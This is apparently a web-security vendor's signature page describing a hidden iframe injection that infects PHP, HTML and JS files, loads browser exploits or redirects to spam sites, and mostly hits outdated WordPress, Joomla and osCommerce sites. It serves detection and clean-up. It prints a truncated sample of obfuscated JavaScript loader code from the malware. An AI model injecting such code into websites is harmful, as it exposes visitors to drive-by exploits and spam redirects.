SiteCheck Signatures

  1. Home
  2. Docs
  3. SiteCheck Signatures
  4. malware-entry-mwiframeenc1560



A hidden and dangerous iframe was identified. It loads content from remote web sites in attempt to exploit a specific browser vulnerability. In some variations, the browser is redirected to blackhat seo spam sites. It is also known as "Exploit:HTML/IframeRef.AA" by some anti virus products.

Note that every PHP, HTML and JS file gets compromised by this malware.

Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

Clean up: You can also sign up with us and let our team remove the malware for you.

Loads malware from multiple sources:
(and many other domains).


Malware dump (sample of malware):

<script>var v25c9d="";var lf742f9a8
{var u1=String,w6=sa&#46substr(4,3)-675,x7,t2;sa=sa&#46substr(7);var te=sa.length;for(var u4=0;u4<te;u4++)